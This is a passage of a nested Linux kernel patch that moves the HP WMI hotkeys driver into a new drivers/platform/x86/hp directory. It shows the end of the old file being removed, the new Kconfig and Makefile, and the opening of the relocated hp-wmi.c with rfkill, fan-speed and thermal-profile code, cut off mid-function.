+-	 * devices. All features supported by this command will no
+-	 * longer be supported.
+-	 */
+-	if (!hp_wmi_bios_2009_later()) {
+-		if (hp_wmi_rfkill_setup(device))
+-			hp_wmi_rfkill2_setup(device);
+-	}
+-
+-	err = hp_wmi_hwmon_init();
+-
+-	if (err < 0)
+-		return err;
+-
+-	thermal_profile_setup();
+-
+-	return 0;
+-}
+-
+-static int __exit hp_wmi_bios_remove(struct platform_device *device)
+-{
+-	int i;
+-
+-	for (i = 0; i < rfkill2_count; i++) {
+-		rfkill_unregister(rfkill2[i].rfkill);
+-		rfkill_destroy(rfkill2[i].rfkill);
+-	}
+-
+-	if (wifi_rfkill) {
+-		rfkill_unregister(wifi_rfkill);
+-		rfkill_destroy(wifi_rfkill);
+-	}
+-	if (bluetooth_rfkill) {
+-		rfkill_unregister(bluetooth_rfkill);
+-		rfkill_destroy(bluetooth_rfkill);
+-	}
+-	if (wwan_rfkill) {
+-		rfkill_unregister(wwan_rfkill);
+-		rfkill_destroy(wwan_rfkill);
+-	}
+-
+-	if (platform_profile_support)
+-		platform_profile_remove();
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_resume_handler(struct device *device)
+-{
+-	/*
+-	 * Hardware state may have changed while suspended, so trigger
+-	 * input events for the current state. As this is a switch,
+-	 * the input layer will only actually pass it on if the state
+-	 * changed.
+-	 */
+-	if (hp_wmi_input_dev) {
+-		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_DOCK,
+-					    hp_wmi_get_dock_state());
+-		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
+-					    hp_wmi_get_tablet_mode());
+-		input_sync(hp_wmi_input_dev);
+-	}
+-
+-	if (rfkill2_count)
+-		hp_wmi_rfkill2_refresh();
+-
+-	if (wifi_rfkill)
+-		rfkill_set_states(wifi_rfkill,
+-				  hp_wmi_get_sw_state(HPWMI_WIFI),
+-				  hp_wmi_get_hw_state(HPWMI_WIFI));
+-	if (bluetooth_rfkill)
+-		rfkill_set_states(bluetooth_rfkill,
+-				  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
+-				  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
+-	if (wwan_rfkill)
+-		rfkill_set_states(wwan_rfkill,
+-				  hp_wmi_get_sw_state(HPWMI_WWAN),
+-				  hp_wmi_get_hw_state(HPWMI_WWAN));
+-
+-	return 0;
+-}
+-
+-static const struct dev_pm_ops hp_wmi_pm_ops = {
+-	.resume  = hp_wmi_resume_handler,
+-	.restore  = hp_wmi_resume_handler,
+-};
+-
+-static struct platform_driver hp_wmi_driver = {
+-	.driver = {
+-		.name = "hp-wmi",
+-		.pm = &hp_wmi_pm_ops,
+-		.dev_groups = hp_wmi_groups,
+-	},
+-	.remove = __exit_p(hp_wmi_bios_remove),
+-};
+-
+-static umode_t hp_wmi_hwmon_is_visible(const void *data,
+-				       enum hwmon_sensor_types type,
+-				       u32 attr, int channel)
+-{
+-	switch (type) {
+-	case hwmon_pwm:
+-		return 0644;
+-	case hwmon_fan:
+-		if (hp_wmi_get_fan_speed(channel) >= 0)
+-			return 0444;
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_hwmon_read(struct device *dev, enum hwmon_sensor_types type,
+-			     u32 attr, int channel, long *val)
+-{
+-	int ret;
+-
+-	switch (type) {
+-	case hwmon_fan:
+-		ret = hp_wmi_get_fan_speed(channel);
+-
+-		if (ret < 0)
+-			return ret;
+-		*val = ret;
+-		return 0;
+-	case hwmon_pwm:
+-		switch (hp_wmi_fan_speed_max_get()) {
+-		case 0:
+-			/* 0 is automatic fan, which is 2 for hwmon */
+-			*val = 2;
+-			return 0;
+-		case 1:
+-			/* 1 is max fan, which is 0
+-			 * (no fan speed control) for hwmon
+-			 */
+-			*val = 0;
+-			return 0;
+-		default:
+-			/* shouldn't happen */
+-			return -ENODATA;
+-		}
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int hp_wmi_hwmon_write(struct device *dev, enum hwmon_sensor_types type,
+-			      u32 attr, int channel, long val)
+-{
+-	switch (type) {
+-	case hwmon_pwm:
+-		switch (val) {
+-		case 0:
+-			/* 0 is no fan speed control (max), which is 1 for us */
+-			return hp_wmi_fan_speed_max_set(1);
+-		case 2:
+-			/* 2 is automatic speed control, which is 0 for us */
+-			return hp_wmi_fan_speed_max_set(0);
+-		default:
+-			/* we don't support manual fan speed control */
+-			return -EINVAL;
+-		}
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-}
+-
+-static const struct hwmon_channel_info *info[] = {
+-	HWMON_CHANNEL_INFO(fan, HWMON_F_INPUT, HWMON_F_INPUT),
+-	HWMON_CHANNEL_INFO(pwm, HWMON_PWM_ENABLE),
+-	NULL
+-};
+-
+-static const struct hwmon_ops ops = {
+-	.is_visible = hp_wmi_hwmon_is_visible,
+-	.read = hp_wmi_hwmon_read,
+-	.write = hp_wmi_hwmon_write,
+-};
+-
+-static const struct hwmon_chip_info chip_info = {
+-	.ops = &ops,
+-	.info = info,
+-};
+-
+-static int hp_wmi_hwmon_init(void)
+-{
+-	struct device *dev = &hp_wmi_platform_dev->dev;
+-	struct device *hwmon;
+-
+-	hwmon = devm_hwmon_device_register_with_info(dev, "hp", &hp_wmi_driver,
+-						     &chip_info, NULL);
+-
+-	if (IS_ERR(hwmon)) {
+-		dev_err(dev, "Could not register hp hwmon device\n");
+-		return PTR_ERR(hwmon);
+-	}
+-
+-	return 0;
+-}
+-
+-static int __init hp_wmi_init(void)
+-{
+-	int event_capable = wmi_has_guid(HPWMI_EVENT_GUID);
+-	int bios_capable = wmi_has_guid(HPWMI_BIOS_GUID);
+-	int err, tmp = 0;
+-
+-	if (!bios_capable && !event_capable)
+-		return -ENODEV;
+-
+-	if (hp_wmi_perform_query(HPWMI_HARDWARE_QUERY, HPWMI_READ, &tmp,
+-				 sizeof(tmp), sizeof(tmp)) == HPWMI_RET_INVALID_PARAMETERS)
+-		zero_insize_support = true;
+-
+-	if (event_capable) {
+-		err = hp_wmi_input_setup();
+-		if (err)
+-			return err;
+-	}
+-
+-	if (bios_capable) {
+-		hp_wmi_platform_dev =
+-			platform_device_register_simple("hp-wmi", PLATFORM_DEVID_NONE, NULL, 0);
+-		if (IS_ERR(hp_wmi_platform_dev)) {
+-			err = PTR_ERR(hp_wmi_platform_dev);
+-			goto err_destroy_input;
+-		}
+-
+-		err = platform_driver_probe(&hp_wmi_driver, hp_wmi_bios_setup);
+-		if (err)
+-			goto err_unregister_device;
+-	}
+-
+-	return 0;
+-
+-err_unregister_device:
+-	platform_device_unregister(hp_wmi_platform_dev);
+-err_destroy_input:
+-	if (event_capable)
+-		hp_wmi_input_destroy();
+-
+-	return err;
+-}
+-module_init(hp_wmi_init);
+-
+-static void __exit hp_wmi_exit(void)
+-{
+-	if (wmi_has_guid(HPWMI_EVENT_GUID))
+-		hp_wmi_input_destroy();
+-
+-	if (hp_wmi_platform_dev) {
+-		platform_device_unregister(hp_wmi_platform_dev);
+-		platform_driver_unregister(&hp_wmi_driver);
+-	}
+-}
+-module_exit(hp_wmi_exit);
+diff --git a/drivers/platform/x86/hp/Kconfig b/drivers/platform/x86/hp/Kconfig
+new file mode 100644
+index 0000000000000..ae165955311ce
+--- /dev/null
++++ b/drivers/platform/x86/hp/Kconfig
+@@ -0,0 +1,63 @@
++# SPDX-License-Identifier: GPL-2.0-only
++#
++# X86 Platform Specific Drivers
++#
++menuconfig X86_PLATFORM_DRIVERS_HP
++	bool "HP X86 Platform Specific Device Drivers"
++	depends on X86_PLATFORM_DEVICES
++	help
++	  Say Y here to get to see options for device drivers for various
++	  HP x86 platforms, including vendor-specific laptop extension drivers.
++	  This option alone does not add any kernel code.
++
++	  If you say N, all options in this submenu will be skipped and disabled.
++
++if X86_PLATFORM_DRIVERS_HP
++
++config HP_ACCEL
++	tristate "HP laptop accelerometer"
++	default m
++	depends on INPUT && ACPI
++	depends on SERIO_I8042
++	select SENSORS_LIS3LV02D
++	select NEW_LEDS
++	select LEDS_CLASS
++	help
++	  This driver provides support for the "Mobile Data Protection System 3D"
++	  or "3D DriveGuard" feature of HP laptops. On such systems the driver
++	  should load automatically (via ACPI alias).
++
++	  Support for a led indicating disk protection will be provided as
++	  hp::hddprotect. For more information on the feature, refer to
++	  Documentation/misc-devices/lis3lv02d.rst.
++
++	  To compile this driver as a module, choose M here: the module will
++	  be called hp_accel.
++
++config HP_WMI
++	tristate "HP WMI extras"
++	default m
++	depends on ACPI_WMI
++	depends on INPUT
++	depends on RFKILL || RFKILL = n
++	select INPUT_SPARSEKMAP
++	select ACPI_PLATFORM_PROFILE
++	select HWMON
++	help
++	  Say Y here if you want to support WMI-based hotkeys on HP laptops and
++	  to read data from WMI such as docking or ambient light sensor state.
++
++	  To compile this driver as a module, choose M here: the module will
++	  be called hp-wmi.
++
++config TC1100_WMI
++	tristate "HP Compaq TC1100 Tablet WMI Extras"
++	default m
++	depends on !X86_64
++	depends on ACPI
++	depends on ACPI_WMI
++	help
++	  This is a driver for the WMI extensions (wireless and bluetooth power
++	  control) of the HP Compaq TC1100 tablet.
++
++endif # X86_PLATFORM_DRIVERS_HP
+diff --git a/drivers/platform/x86/hp/Makefile b/drivers/platform/x86/hp/Makefile
+new file mode 100644
+index 0000000000000..db1eed4cd7c7d
+--- /dev/null
++++ b/drivers/platform/x86/hp/Makefile
+@@ -0,0 +1,10 @@
++# SPDX-License-Identifier: GPL-2.0
++#
++# Makefile for linux/drivers/platform/x86/hp
++# HP x86 Platform-Specific Drivers
++#
++
++# Hewlett Packard
++obj-$(CONFIG_HP_ACCEL)		+= hp_accel.o
++obj-$(CONFIG_HP_WMI)		+= hp-wmi.o
++obj-$(CONFIG_TC1100_WMI)	+= tc1100-wmi.o
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+new file mode 100644
+index 0000000000000..94af7d398a1bf
+--- /dev/null
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -0,0 +1,1571 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * HP WMI hotkeys
++ *
++ * Copyright (C) 2008 Red Hat <mjg@redhat.com>
++ * Copyright (C) 2010, 2011 Anssi Hannula <anssi.hannula@iki.fi>
++ *
++ * Portions based on wistron_btns.c:
++ * Copyright (C) 2005 Miloslav Trmac <mitr@volny.cz>
++ * Copyright (C) 2005 Bernhard Rosenkraenzer <bero@arklinux.org>
++ * Copyright (C) 2005 Dmitry Torokhov <dtor@mail.ru>
++ */
++
++#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
++
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/init.h>
++#include <linux/slab.h>
++#include <linux/types.h>
++#include <linux/input.h>
++#include <linux/input/sparse-keymap.h>
++#include <linux/platform_device.h>
++#include <linux/platform_profile.h>
++#include <linux/hwmon.h>
++#include <linux/acpi.h>
++#include <linux/rfkill.h>
++#include <linux/string.h>
++#include <linux/dmi.h>
++
++MODULE_AUTHOR("Matthew Garrett <mjg59@srcf.ucam.org>");
++MODULE_DESCRIPTION("HP laptop WMI hotkeys driver");
++MODULE_LICENSE("GPL");
++
++MODULE_ALIAS("wmi:95F24279-4D7B-4334-9387-ACCDC67EF61C");
++MODULE_ALIAS("wmi:5FB7F034-2C63-45e9-BE91-3D44E2C707E4");
++
++#define HPWMI_EVENT_GUID "95F24279-4D7B-4334-9387-ACCDC67EF61C"
++#define HPWMI_BIOS_GUID "5FB7F034-2C63-45e9-BE91-3D44E2C707E4"
++#define HP_OMEN_EC_THERMAL_PROFILE_OFFSET 0x95
++#define zero_if_sup(tmp) (zero_insize_support?0:sizeof(tmp)) // use when zero insize is required
++
++/* DMI board names of devices that should use the omen specific path for
++ * thermal profiles.
++ * This was obtained by taking a look in the windows omen command center
++ * app and parsing a json file that they use to figure out what capabilities
++ * the device should have.
++ * A device is considered an omen if the DisplayName in that list contains
++ * "OMEN", and it can use the thermal profile stuff if the "Feature" array
++ * contains "PerformanceControl".
++ */
++static const char * const omen_thermal_profile_boards[] = {
++	"84DA", "84DB", "84DC", "8574", "8575", "860A", "87B5", "8572", "8573",
++	"8600", "8601", "8602", "8605", "8606", "8607", "8746", "8747", "8749",
++	"874A", "8603", "8604", "8748", "886B", "886C", "878A", "878B", "878C",
++	"88C8", "88CB", "8786", "8787", "8788", "88D1", "88D2", "88F4", "88FD",
++	"88F5", "88F6", "88F7", "88FE", "88FF", "8900", "8901", "8902", "8912",
++	"8917", "8918", "8949", "894A", "89EB"
++};
++
++/* DMI Board names of Omen laptops that are specifically set to be thermal
++ * profile version 0 by the Omen Command Center app, regardless of what
++ * the get system design information WMI call returns
++ */
++static const char *const omen_thermal_profile_force_v0_boards[] = {
++	"8607", "8746", "8747", "8749", "874A", "8748"
++};
++
++enum hp_wmi_radio {
++	HPWMI_WIFI	= 0x0,
++	HPWMI_BLUETOOTH	= 0x1,
++	HPWMI_WWAN	= 0x2,
++	HPWMI_GPS	= 0x3,
++};
++
++enum hp_wmi_event_ids {
++	HPWMI_DOCK_EVENT		= 0x01,
++	HPWMI_PARK_HDD			= 0x02,
++	HPWMI_SMART_ADAPTER		= 0x03,
++	HPWMI_BEZEL_BUTTON		= 0x04,
++	HPWMI_WIRELESS			= 0x05,
++	HPWMI_CPU_BATTERY_THROTTLE	= 0x06,
++	HPWMI_LOCK_SWITCH		= 0x07,
++	HPWMI_LID_SWITCH		= 0x08,
++	HPWMI_SCREEN_ROTATION		= 0x09,
++	HPWMI_COOLSENSE_SYSTEM_MOBILE	= 0x0A,
++	HPWMI_COOLSENSE_SYSTEM_HOT	= 0x0B,
++	HPWMI_PROXIMITY_SENSOR		= 0x0C,
++	HPWMI_BACKLIT_KB_BRIGHTNESS	= 0x0D,
++	HPWMI_PEAKSHIFT_PERIOD		= 0x0F,
++	HPWMI_BATTERY_CHARGE_PERIOD	= 0x10,
++	HPWMI_SANITIZATION_MODE		= 0x17,
++	HPWMI_OMEN_KEY			= 0x1D,
++	HPWMI_SMART_EXPERIENCE_APP	= 0x21,
++};
++
++/*
++ * struct bios_args buffer is dynamically allocated.  New WMI command types
++ * were introduced that exceeds 128-byte data size.  Changes to handle
++ * the data size allocation scheme were kept in hp_wmi_perform_qurey function.
++ */
++struct bios_args {
++	u32 signature;
++	u32 command;
++	u32 commandtype;
++	u32 datasize;
++	u8 data[];
++};
++
++enum hp_wmi_commandtype {
++	HPWMI_DISPLAY_QUERY		= 0x01,
++	HPWMI_HDDTEMP_QUERY		= 0x02,
++	HPWMI_ALS_QUERY			= 0x03,
++	HPWMI_HARDWARE_QUERY		= 0x04,
++	HPWMI_WIRELESS_QUERY		= 0x05,
++	HPWMI_BATTERY_QUERY		= 0x07,
++	HPWMI_BIOS_QUERY		= 0x09,
++	HPWMI_FEATURE_QUERY		= 0x0b,
++	HPWMI_HOTKEY_QUERY		= 0x0c,
++	HPWMI_FEATURE2_QUERY		= 0x0d,
++	HPWMI_WIRELESS2_QUERY		= 0x1b,
++	HPWMI_POSTCODEERROR_QUERY	= 0x2a,
++	HPWMI_SYSTEM_DEVICE_MODE	= 0x40,
++	HPWMI_THERMAL_PROFILE_QUERY	= 0x4c,
++};
++
++enum hp_wmi_gm_commandtype {
++	HPWMI_FAN_SPEED_GET_QUERY = 0x11,
++	HPWMI_SET_PERFORMANCE_MODE = 0x1A,
++	HPWMI_FAN_SPEED_MAX_GET_QUERY = 0x26,
++	HPWMI_FAN_SPEED_MAX_SET_QUERY = 0x27,
++	HPWMI_GET_SYSTEM_DESIGN_DATA = 0x28,
++};
++
++enum hp_wmi_command {
++	HPWMI_READ	= 0x01,
++	HPWMI_WRITE	= 0x02,
++	HPWMI_ODM	= 0x03,
++	HPWMI_GM	= 0x20008,
++};
++
++enum hp_wmi_hardware_mask {
++	HPWMI_DOCK_MASK		= 0x01,
++	HPWMI_TABLET_MASK	= 0x04,
++};
++
++struct bios_return {
++	u32 sigpass;
++	u32 return_code;
++};
++
++enum hp_return_value {
++	HPWMI_RET_WRONG_SIGNATURE	= 0x02,
++	HPWMI_RET_UNKNOWN_COMMAND	= 0x03,
++	HPWMI_RET_UNKNOWN_CMDTYPE	= 0x04,
++	HPWMI_RET_INVALID_PARAMETERS	= 0x05,
++};
++
++enum hp_wireless2_bits {
++	HPWMI_POWER_STATE	= 0x01,
++	HPWMI_POWER_SOFT	= 0x02,
++	HPWMI_POWER_BIOS	= 0x04,
++	HPWMI_POWER_HARD	= 0x08,
++	HPWMI_POWER_FW_OR_HW	= HPWMI_POWER_BIOS | HPWMI_POWER_HARD,
++};
++
++enum hp_thermal_profile_omen_v0 {
++	HP_OMEN_V0_THERMAL_PROFILE_DEFAULT     = 0x00,
++	HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE = 0x01,
++	HP_OMEN_V0_THERMAL_PROFILE_COOL        = 0x02,
++};
++
++enum hp_thermal_profile_omen_v1 {
++	HP_OMEN_V1_THERMAL_PROFILE_DEFAULT	= 0x30,
++	HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE	= 0x31,
++	HP_OMEN_V1_THERMAL_PROFILE_COOL		= 0x50,
++};
++
++enum hp_thermal_profile {
++	HP_THERMAL_PROFILE_PERFORMANCE	= 0x00,
++	HP_THERMAL_PROFILE_DEFAULT		= 0x01,
++	HP_THERMAL_PROFILE_COOL			= 0x02,
++	HP_THERMAL_PROFILE_QUIET		= 0x03,
++};
++
++#define IS_HWBLOCKED(x) ((x & HPWMI_POWER_FW_OR_HW) != HPWMI_POWER_FW_OR_HW)
++#define IS_SWBLOCKED(x) !(x & HPWMI_POWER_SOFT)
++
++struct bios_rfkill2_device_state {
++	u8 radio_type;
++	u8 bus_type;
++	u16 vendor_id;
++	u16 product_id;
++	u16 subsys_vendor_id;
++	u16 subsys_product_id;
++	u8 rfkill_id;
++	u8 power;
++	u8 unknown[4];
++};
++
++/* 7 devices fit into the 128 byte buffer */
++#define HPWMI_MAX_RFKILL2_DEVICES	7
++
++struct bios_rfkill2_state {
++	u8 unknown[7];
++	u8 count;
++	u8 pad[8];
++	struct bios_rfkill2_device_state device[HPWMI_MAX_RFKILL2_DEVICES];
++};
++
++static const struct key_entry hp_wmi_keymap[] = {
++	{ KE_KEY, 0x02,    { KEY_BRIGHTNESSUP } },
++	{ KE_KEY, 0x03,    { KEY_BRIGHTNESSDOWN } },
++	{ KE_KEY, 0x270,   { KEY_MICMUTE } },
++	{ KE_KEY, 0x20e6,  { KEY_PROG1 } },
++	{ KE_KEY, 0x20e8,  { KEY_MEDIA } },
++	{ KE_KEY, 0x2142,  { KEY_MEDIA } },
++	{ KE_KEY, 0x213b,  { KEY_INFO } },
++	{ KE_KEY, 0x2169,  { KEY_ROTATE_DISPLAY } },
++	{ KE_KEY, 0x216a,  { KEY_SETUP } },
++	{ KE_KEY, 0x21a5,  { KEY_PROG2 } }, /* HP Omen Key */
++	{ KE_KEY, 0x21a7,  { KEY_FN_ESC } },
++	{ KE_KEY, 0x21a9,  { KEY_TOUCHPAD_OFF } },
++	{ KE_KEY, 0x121a9, { KEY_TOUCHPAD_ON } },
++	{ KE_KEY, 0x231b,  { KEY_HELP } },
++	{ KE_END, 0 }
++};
++
++static struct input_dev *hp_wmi_input_dev;
++static struct platform_device *hp_wmi_platform_dev;
++static struct platform_profile_handler platform_profile_handler;
++static bool platform_profile_support;
++static bool zero_insize_support;
++
++static struct rfkill *wifi_rfkill;
++static struct rfkill *bluetooth_rfkill;
++static struct rfkill *wwan_rfkill;
++
++struct rfkill2_device {
++	u8 id;
++	int num;
++	struct rfkill *rfkill;
++};
++
++static int rfkill2_count;
++static struct rfkill2_device rfkill2[HPWMI_MAX_RFKILL2_DEVICES];
++
++/*
++ * Chassis Types values were obtained from SMBIOS reference
++ * specification version 3.00. A complete list of system enclosures
++ * and chassis types is available on Table 17.
++ */
++static const char * const tablet_chassis_types[] = {
++	"30", /* Tablet*/
++	"31", /* Convertible */
++	"32"  /* Detachable */
++};
++
++#define DEVICE_MODE_TABLET	0x06
++
++/* map output size to the corresponding WMI method id */
++static inline int encode_outsize_for_pvsz(int outsize)
++{
++	if (outsize > 4096)
++		return -EINVAL;
++	if (outsize > 1024)
++		return 5;
++	if (outsize > 128)
++		return 4;
++	if (outsize > 4)
++		return 3;
++	if (outsize > 0)
++		return 2;
++	return 1;
++}
++
++/*
++ * hp_wmi_perform_query
++ *
++ * query:	The commandtype (enum hp_wmi_commandtype)
++ * write:	The command (enum hp_wmi_command)
++ * buffer:	Buffer used as input and/or output
++ * insize:	Size of input buffer
++ * outsize:	Size of output buffer
++ *
++ * returns zero on success
++ *         an HP WMI query specific error code (which is positive)
++ *         -EINVAL if the query was not successful at all
++ *         -EINVAL if the output buffer size exceeds buffersize
++ *
++ * Note: The buffersize must at least be the maximum of the input and output
++ *       size. E.g. Battery info query is defined to have 1 byte input
++ *       and 128 byte output. The caller would do:
++ *       buffer = kzalloc(128, GFP_KERNEL);
++ *       ret = hp_wmi_perform_query(HPWMI_BATTERY_QUERY, HPWMI_READ, buffer, 1, 128)
++ */
++static int hp_wmi_perform_query(int query, enum hp_wmi_command command,
++				void *buffer, int insize, int outsize)
++{
++	struct acpi_buffer input, output = { ACPI_ALLOCATE_BUFFER, NULL };
++	struct bios_return *bios_return;
++	union acpi_object *obj = NULL;
++	struct bios_args *args = NULL;
++	int mid, actual_insize, actual_outsize;
++	size_t bios_args_size;
++	int ret;
++
++	mid = encode_outsize_for_pvsz(outsize);
++	if (WARN_ON(mid < 0))
++		return mid;
++
++	actual_insize = max(insize, 128);
++	bios_args_size = struct_size(args, data, actual_insize);
++	args = kmalloc(bios_args_size, GFP_KERNEL);
++	if (!args)
++		return -ENOMEM;
++
++	input.length = bios_args_size;
++	input.pointer = args;
++
++	args->signature = 0x55434553;
++	args->command = command;
++	args->commandtype = query;
++	args->datasize = insize;
++	memcpy(args->data, buffer, flex_array_size(args, data, insize));
++
++	ret = wmi_evaluate_method(HPWMI_BIOS_GUID, 0, mid, &input, &output);
++	if (ret)
++		goto out_free;
++
++	obj = output.pointer;
++	if (!obj) {
++		ret = -EINVAL;
++		goto out_free;
++	}
++
++	if (obj->type != ACPI_TYPE_BUFFER) {
++		pr_warn("query 0x%x returned an invalid object 0x%x\n", query, ret);
++		ret = -EINVAL;
++		goto out_free;
++	}
++
++	bios_return = (struct bios_return *)obj->buffer.pointer;
++	ret = bios_return->return_code;
++
++	if (ret) {
++		if (ret != HPWMI_RET_UNKNOWN_COMMAND &&
++		    ret != HPWMI_RET_UNKNOWN_CMDTYPE)
++			pr_warn("query 0x%x returned error 0x%x\n", query, ret);
++		goto out_free;
++	}
++
++	/* Ignore output data of zero size */
++	if (!outsize)
++		goto out_free;
++
++	actual_outsize = min(outsize, (int)(obj->buffer.length - sizeof(*bios_return)));
++	memcpy(buffer, obj->buffer.pointer + sizeof(*bios_return), actual_outsize);
++	memset(buffer + actual_outsize, 0, outsize - actual_outsize);
++
++out_free:
++	kfree(obj);
++	kfree(args);
++	return ret;
++}
++
++static int hp_wmi_get_fan_speed(int fan)
++{
++	u8 fsh, fsl;
++	char fan_data[4] = { fan, 0, 0, 0 };
++
++	int ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_GET_QUERY, HPWMI_GM,
++				       &fan_data, sizeof(char),
++				       sizeof(fan_data));
++
++	if (ret != 0)
++		return -EINVAL;
++
++	fsh = fan_data[2];
++	fsl = fan_data[3];
++
++	return (fsh << 8) | fsl;
++}
++
++static int hp_wmi_read_int(int query)
++{
++	int val = 0, ret;
++
++	ret = hp_wmi_perform_query(query, HPWMI_READ, &val,
++				   zero_if_sup(val), sizeof(val));
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return val;
++}
++
++static int hp_wmi_get_dock_state(void)
++{
++	int state = hp_wmi_read_int(HPWMI_HARDWARE_QUERY);
++
++	if (state < 0)
++		return state;
++
++	return !!(state & HPWMI_DOCK_MASK);
++}
++
++static int hp_wmi_get_tablet_mode(void)
++{
++	char system_device_mode[4] = { 0 };
++	const char *chassis_type;
++	bool tablet_found;
++	int ret;
++
++	chassis_type = dmi_get_system_info(DMI_CHASSIS_TYPE);
++	if (!chassis_type)
++		return -ENODEV;
++
++	tablet_found = match_string(tablet_chassis_types,
++				    ARRAY_SIZE(tablet_chassis_types),
++				    chassis_type) >= 0;
++	if (!tablet_found)
++		return -ENODEV;
++
++	ret = hp_wmi_perform_query(HPWMI_SYSTEM_DEVICE_MODE, HPWMI_READ,
++				   system_device_mode, zero_if_sup(system_device_mode),
++				   sizeof(system_device_mode));
++	if (ret < 0)
++		return ret;
++
++	return system_device_mode[0] == DEVICE_MODE_TABLET;
++}
++
++static int omen_thermal_profile_set(int mode)
++{
++	char buffer[2] = {0, mode};
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_SET_PERFORMANCE_MODE, HPWMI_GM,
++				   &buffer, sizeof(buffer), 0);
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return mode;
++}
++
++static bool is_omen_thermal_profile(void)
++{
++	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
++
++	if (!board_name)
++		return false;
++
++	return match_string(omen_thermal_profile_boards,
++			    ARRAY_SIZE(omen_thermal_profile_boards),
++			    board_name) >= 0;
++}
++
++static int omen_get_thermal_policy_version(void)
++{
++	unsigned char buffer[8] = { 0 };
++	int ret;
++
++	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
++
++	if (board_name) {
++		int matches = match_string(omen_thermal_profile_force_v0_boards,
++			ARRAY_SIZE(omen_thermal_profile_force_v0_boards),
++			board_name);
++		if (matches >= 0)
++			return 0;
++	}
++
++	ret = hp_wmi_perform_query(HPWMI_GET_SYSTEM_DESIGN_DATA, HPWMI_GM,
++				   &buffer, sizeof(buffer), sizeof(buffer));
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return buffer[3];
++}
++
++static int omen_thermal_profile_get(void)
++{
++	u8 data;
++
++	int ret = ec_read(HP_OMEN_EC_THERMAL_PROFILE_OFFSET, &data);
++
++	if (ret)
++		return ret;
++
++	return data;
++}
++
++static int hp_wmi_fan_speed_max_set(int enabled)
++{
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_SET_QUERY, HPWMI_GM,
++				   &enabled, sizeof(enabled), 0);
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return enabled;
++}
++
++static int hp_wmi_fan_speed_max_get(void)
++{
++	int val = 0, ret;
++
++	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_GET_QUERY, HPWMI_GM,
++				   &val, zero_if_sup(val), sizeof(val));
++
++	if (ret)
++		return ret < 0 ? ret : -EINVAL;
++
++	return val;
++}
++
++static int __init hp_wmi_bios_2008_later(void)
++{
++	int state = 0;
++	int ret = hp_wmi_perform_query(HPWMI_FEATURE_QUERY, HPWMI_READ, &state,
++				       zero_if_sup(state), sizeof(state));
++	if (!ret)
++		return 1;
++
++	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
++}
++
++static int __init hp_wmi_bios_2009_later(void)
++{
++	u8 state[128];
++	int ret = hp_wmi_perform_query(HPWMI_FEATURE2_QUERY, HPWMI_READ, &state,
++				       zero_if_sup(state), sizeof(state));
++	if (!ret)
++		return 1;
++
++	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
++}
++
++static int __init hp_wmi_enable_hotkeys(void)
++{
++	int value = 0x6e;
++	int ret = hp_wmi_perform_query(HPWMI_BIOS_QUERY, HPWMI_WRITE, &value,
++				       sizeof(value), 0);
++
++	return ret <= 0 ? ret : -EINVAL;
++}
++
++static int hp_wmi_set_block(void *data, bool blocked)
++{
++	enum hp_wmi_radio r = (enum hp_wmi_radio) data;
++	int query = BIT(r + 8) | ((!blocked) << r);
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE,
++				   &query, sizeof(query), 0);
++
++	return ret <= 0 ? ret : -EINVAL;
++}
++
++static const struct rfkill_ops hp_wmi_rfkill_ops = {
++	.set_block = hp_wmi_set_block,
++};
++
++static bool hp_wmi_get_sw_state(enum hp_wmi_radio r)
++{
++	int mask = 0x200 << (r * 8);
++
++	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
++
++	/* TBD: Pass error */
++	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
++
++	return !(wireless & mask);
++}
++
++static bool hp_wmi_get_hw_state(enum hp_wmi_radio r)
++{
++	int mask = 0x800 << (r * 8);
++
++	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
++
++	/* TBD: Pass error */
++	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
++
++	return !(wireless & mask);
++}
++
++static int hp_wmi_rfkill2_set_block(void *data, bool blocked)
++{
++	int rfkill_id = (int)(long)data;
++	char buffer[4] = { 0x01, 0x00, rfkill_id, !blocked };
++	int ret;
++
++	ret = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_WRITE,
++				   buffer, sizeof(buffer), 0);
++
++	return ret <= 0 ? ret : -EINVAL;
++}
++
++static const struct rfkill_ops hp_wmi_rfkill2_ops = {
++	.set_block = hp_wmi_rfkill2_set_block,
++};
++
++static int hp_wmi_rfkill2_refresh(void)
++{
++	struct bios_rfkill2_state state;
++	int err, i;
++
